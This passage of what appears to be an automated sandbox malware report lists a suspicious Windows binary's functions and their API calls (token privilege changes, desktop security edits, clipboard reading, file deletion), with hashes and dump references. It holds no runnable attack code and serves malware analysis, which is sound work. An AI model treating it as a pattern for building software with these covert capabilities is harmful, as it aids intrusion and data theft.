                                        • Part of subcall function 008E10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008E11FC), ref: 008E10D4
                                        • Part of subcall function 008E10BF: CloseHandle.KERNEL32(?,?,008E11FC), ref: 008E10E9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                      • String ID: $default$winsta0
                                      • API String ID: 22674027-1027155976
                                      • Opcode ID: e0ba568d67c8b7df84116f94f11ab5eea46db554f3d57bdfabd663f9567133be
                                      • Instruction ID: 64913c85b6b3427f26d31d63703cfbd2b8a3e934b342ff1935e0a6cef8ec00cf
                                      • Opcode Fuzzy Hash: e0ba568d67c8b7df84116f94f11ab5eea46db554f3d57bdfabd663f9567133be
                                      • Instruction Fuzzy Hash: DF81A2B1A40289AFDF119FA9DC49FEE7BBAFF05704F148119F911E62A0C7708944DB25
                                      Function 008E0B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008E10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008E1114
                                        • Part of subcall function 008E10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,008E0B9B,?,?,?), ref: 008E1120
                                        • Part of subcall function 008E10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,008E0B9B,?,?,?), ref: 008E112F
                                        • Part of subcall function 008E10F9: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 008E1136
                                        • Part of subcall function 008E10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008E114D
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 008E0BCC
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 008E0C00
                                      • GetLengthSid.ADVAPI32(?), ref: 008E0C17
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 008E0C51
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008E0C6D
                                      • GetLengthSid.ADVAPI32(?), ref: 008E0C84
                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 008E0C8C
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 008E0C93
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 008E0CB4
                                      • CopySid.ADVAPI32(00000000), ref: 008E0CBB
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 008E0CEA
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008E0D0C
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 008E0D1E
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008E0D45
                                      • HeapFree.KERNEL32(00000000), ref: 008E0D4C
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008E0D55
                                      • HeapFree.KERNEL32(00000000), ref: 008E0D5C
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008E0D65
                                      • HeapFree.KERNEL32(00000000), ref: 008E0D6C
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 008E0D78
                                      • HeapFree.KERNEL32(00000000), ref: 008E0D7F
                                        • Part of subcall function 008E1193: GetProcessHeap.KERNEL32(00000008,008E0BB1,?,00000000,?,008E0BB1,?), ref: 008E11A1
                                        • Part of subcall function 008E1193: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 008E11A8
                                        • Part of subcall function 008E1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,008E0BB1,?), ref: 008E11B7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Heap$Process$Security$Free$AllocateDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                      • String ID:
                                      • API String ID: 4042927181-0
                                      • Opcode ID: f3c8cbffba7feb0e871e394f437f3da05db10fe9fcc5b7836396f080120b1183
                                      • Instruction ID: 60cb0d49568589157fdf6e828c8b7b31d16d029261214aa4c0772e1e77aedd2b
                                      • Opcode Fuzzy Hash: f3c8cbffba7feb0e871e394f437f3da05db10fe9fcc5b7836396f080120b1183
                                      • Instruction Fuzzy Hash: 4A719CB1A4424AEBDF10DFA5DC44BEEBBB8FF09300F148A15E914E6190D7B4A945CF60
                                      Function 008FEAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenClipboard.USER32(0091CC08), ref: 008FEB29
                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 008FEB37
                                      • GetClipboardData.USER32(0000000D), ref: 008FEB43
                                      • CloseClipboard.USER32 ref: 008FEB4F
                                      • GlobalLock.KERNEL32(00000000), ref: 008FEB87
                                      • CloseClipboard.USER32 ref: 008FEB91
                                      • GlobalUnlock.KERNEL32(00000000), ref: 008FEBBC
                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 008FEBC9
                                      • GetClipboardData.USER32(00000001), ref: 008FEBD1
                                      • GlobalLock.KERNEL32(00000000), ref: 008FEBE2
                                      • GlobalUnlock.KERNEL32(00000000), ref: 008FEC22
                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 008FEC38
                                      • GetClipboardData.USER32(0000000F), ref: 008FEC44
                                      • GlobalLock.KERNEL32(00000000), ref: 008FEC55
                                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 008FEC77
                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 008FEC94
                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 008FECD2
                                      • GlobalUnlock.KERNEL32(00000000), ref: 008FECF3
                                      • CountClipboardFormats.USER32 ref: 008FED14
                                      • CloseClipboard.USER32 ref: 008FED59
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                      • String ID:
                                      • API String ID: 420908878-0
                                      • Opcode ID: b98d2d11997bd850146fc903ee06c29278a680b4d9ff83cefefb509c35cb4b05
                                      • Instruction ID: a7e39f02000d9df7f29aba5dd83aeddb775986a80c69fd140d6ba2cb725077e8
                                      • Opcode Fuzzy Hash: b98d2d11997bd850146fc903ee06c29278a680b4d9ff83cefefb509c35cb4b05
                                      • Instruction Fuzzy Hash: CE61DC7420820AAFD300EF28C884F7A77A4FF84754F088519F596D72B2DB31E905DB62
                                      Function 0091911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfilenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00899BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00899BB2
                                      • DragQueryPoint.SHELL32(?,?), ref: 00919147
                                        • Part of subcall function 00917674: ClientToScreen.USER32(?,?), ref: 0091769A
                                        • Part of subcall function 00917674: GetWindowRect.USER32(?,?), ref: 00917710
                                        • Part of subcall function 00917674: PtInRect.USER32(?,?,00918B89), ref: 00917720
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 009191B0
                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 009191BB
                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 009191DE
                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00919225
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0091923E
                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00919255
                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00919277
                                      • DragFinish.SHELL32(?), ref: 0091927E
                                      • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00919371
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen
                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                      • API String ID: 4085959399-3440237614
                                      • Opcode ID: eaf3bab6b219af0723eacef02a71140924222d7c27602a61c875636012cd5c25
                                      • Instruction ID: c35d575db3d75c85ff4de02e3ee3faa73ad88161e975148fa4e3e19f77003344
                                      • Opcode Fuzzy Hash: eaf3bab6b219af0723eacef02a71140924222d7c27602a61c875636012cd5c25
                                      • Instruction Fuzzy Hash: 0F618B71208305AFD701EF64DC95EAFBBE8FF89750F00092EF5A5921A0DB309A49CB52
                                      Function 008F698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 008F69BE
                                      • FindClose.KERNEL32(00000000), ref: 008F6A12
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008F6A4E
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008F6A75
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 008F6AB2
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 008F6ADF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                      • API String ID: 3830820486-3289030164
                                      • Opcode ID: 8fa4804bf4b381e8b57089eb6bd721a1a8649cbd15d2b5fe0e98832f070074c0
                                      • Instruction ID: 60c273012d6f5aa0b2f9a194c6a71dc210cd5c2acb9803b4b736de87fbbdd30e
                                      • Opcode Fuzzy Hash: 8fa4804bf4b381e8b57089eb6bd721a1a8649cbd15d2b5fe0e98832f070074c0
                                      • Instruction Fuzzy Hash: FAD14BB2508304AAC714EBA8C981EBBB7E8FF98704F44491DF685D6191EB74DA44CB63
                                      Function 008F9642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 008F9663
                                      • GetFileAttributesW.KERNEL32(?), ref: 008F96A1
                                      • SetFileAttributesW.KERNEL32(?,?), ref: 008F96BB
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 008F96D3
                                      • FindClose.KERNEL32(00000000), ref: 008F96DE
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 008F96FA
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 008F974A
                                      • SetCurrentDirectoryW.KERNEL32(00946B7C), ref: 008F9768
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 008F9772
                                      • FindClose.KERNEL32(00000000), ref: 008F977F
                                      • FindClose.KERNEL32(00000000), ref: 008F978F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                      • String ID: *.*
                                      • API String ID: 1409584000-438819550
                                      • Opcode ID: 82975adcf59ad7dbf617b487c833b21fa96ee0cc7b12faa279d478a53f74f18f
                                      • Instruction ID: 18d791a861ab7f1cbda5de3f2e1f12595a2f2538af285b3f19d38b116788e829
                                      • Opcode Fuzzy Hash: 82975adcf59ad7dbf617b487c833b21fa96ee0cc7b12faa279d478a53f74f18f
                                      • Instruction Fuzzy Hash: 5A31E2B264421D6BDB10AFB4DC08BEE37ACEF49321F108455FA65E21A0EB34DD80CA10
                                      Function 00918D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windownativeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00899BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00899BB2
                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00918D5A
                                      • GetFocus.USER32 ref: 00918D6A
                                      • GetDlgCtrlID.USER32(00000000), ref: 00918D75
                                      • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00918E1D
                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00918ECF
                                      • GetMenuItemCount.USER32(?), ref: 00918EEC
                                      • GetMenuItemID.USER32(?,00000000), ref: 00918EFC
                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00918F2E
                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00918F70
                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00918FA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow
                                      • String ID: 0
                                      • API String ID: 1669892757-4108050209
                                      • Opcode ID: 3ed44656f8c01f72e23c022837a9e63267fcd41cfe3d83aede720aecc66162da
                                      • Instruction ID: 8b28fd99f8f6902d620191c92cb84f5bde8f8df07564f8c7d3202f79f01536c5
                                      • Opcode Fuzzy Hash: 3ed44656f8c01f72e23c022837a9e63267fcd41cfe3d83aede720aecc66162da
                                      • Instruction Fuzzy Hash: 5A81AF717083099FDB10DF14D884AEBBBEAFB88354F140919F985D7291DB30D981EBA2
                                      Function 008F979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 008F97BE
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 008F9819
                                      • FindClose.KERNEL32(00000000), ref: 008F9824
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 008F9840
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 008F9890
                                      • SetCurrentDirectoryW.KERNEL32(00946B7C), ref: 008F98AE
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 008F98B8
                                      • FindClose.KERNEL32(00000000), ref: 008F98C5
                                      • FindClose.KERNEL32(00000000), ref: 008F98D5
                                        • Part of subcall function 008EDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 008EDB00
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                      • String ID: *.*
                                      • API String ID: 2640511053-438819550
                                      • Opcode ID: 79feca6af464418a11f6e4af8051096e6b1d3b326f3d54fcc85cf94fbe91842e
                                      • Instruction ID: 0b205435426a79d0764a869ed7e7756e7b197f37e8e77d3c95d3712e9d9b2610
                                      • Opcode Fuzzy Hash: 79feca6af464418a11f6e4af8051096e6b1d3b326f3d54fcc85cf94fbe91842e
                                      • Instruction Fuzzy Hash: 7231F47165421D6AEB10EFB4DC48BEE37ACFF46364F108165F9A0E2190DB30DE85CA61
                                      Function 008F8195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLocalTime.KERNEL32(?), ref: 008F8257
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 008F8267
                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008F8273
                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008F8310
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 008F8324
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 008F8356
                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 008F838C
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 008F8395
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CurrentDirectoryTime$File$Local$System
                                      • String ID: *.*
                                      • API String ID: 1464919966-438819550
                                      • Opcode ID: 8291877048c71e10c8a027ff23a950d794e776a3c1d1e3cff292d97e95cac0df
                                      • Instruction ID: b160214f34cbf1d65fdd21c1020961b4f373835d5a3b51d423d9005ec74121b8
                                      • Opcode Fuzzy Hash: 8291877048c71e10c8a027ff23a950d794e776a3c1d1e3cff292d97e95cac0df
                                      • Instruction Fuzzy Hash: 5A615BB26083499FDB10EF64C8409AEB3E8FF89314F04891DFA99D7251DB31E945CB92
                                      Function 008ED076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00883AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00883A97,?,?,00882E7F,?,?,?,00000000), ref: 00883AC2
                                        • Part of subcall function 008EE199: GetFileAttributesW.KERNEL32(?,008ECF95), ref: 008EE19A
                                      • FindFirstFileW.KERNEL32(?,?), ref: 008ED122
                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 008ED1DD
                                      • MoveFileW.KERNEL32(?,?), ref: 008ED1F0
                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 008ED20D
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 008ED237
                                        • Part of subcall function 008ED29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,008ED21C,?,?), ref: 008ED2B2
                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 008ED253
                                      • FindClose.KERNEL32(00000000), ref: 008ED264
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                      • String ID: \*.*
                                      • API String ID: 1946585618-1173974218
                                      • Opcode ID: 683c762df736f8188d6f476b3ce6e2583bfdd14f3553afcc7e13fbf6caa5c3c1
                                      • Instruction ID: 20c1bfdc1cba87fb61e1c9f941634c3c1889857b7b9b230025286875767abfe6
                                      • Opcode Fuzzy Hash: 683c762df736f8188d6f476b3ce6e2583bfdd14f3553afcc7e13fbf6caa5c3c1
                                      • Instruction Fuzzy Hash: 4A61593180524D9ACF15EBE5CA529FDB775FF16300F244065E412B7191EB31AF09DB62
                                      Function 008FED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                      • String ID:
                                      • API String ID: 1737998785-0
                                      • Opcode ID: 52efd1703d3e428fd8c7897f94e8410a065db93b9cd6bac94834df0e7dec20a4
                                      • Instruction ID: af93cf1f03a801063145a60ec959eef69a642268f5d98cfb6a9bad46fb7b29b8
                                      • Opcode Fuzzy Hash: 52efd1703d3e428fd8c7897f94e8410a065db93b9cd6bac94834df0e7dec20a4
                                      • Instruction Fuzzy Hash: EB41CE71208215AFE320DF29E888B69BBE1FF44358F14C499E565CBA72C775EC41CB90
                                      Function 008EE8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008E16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008E170D
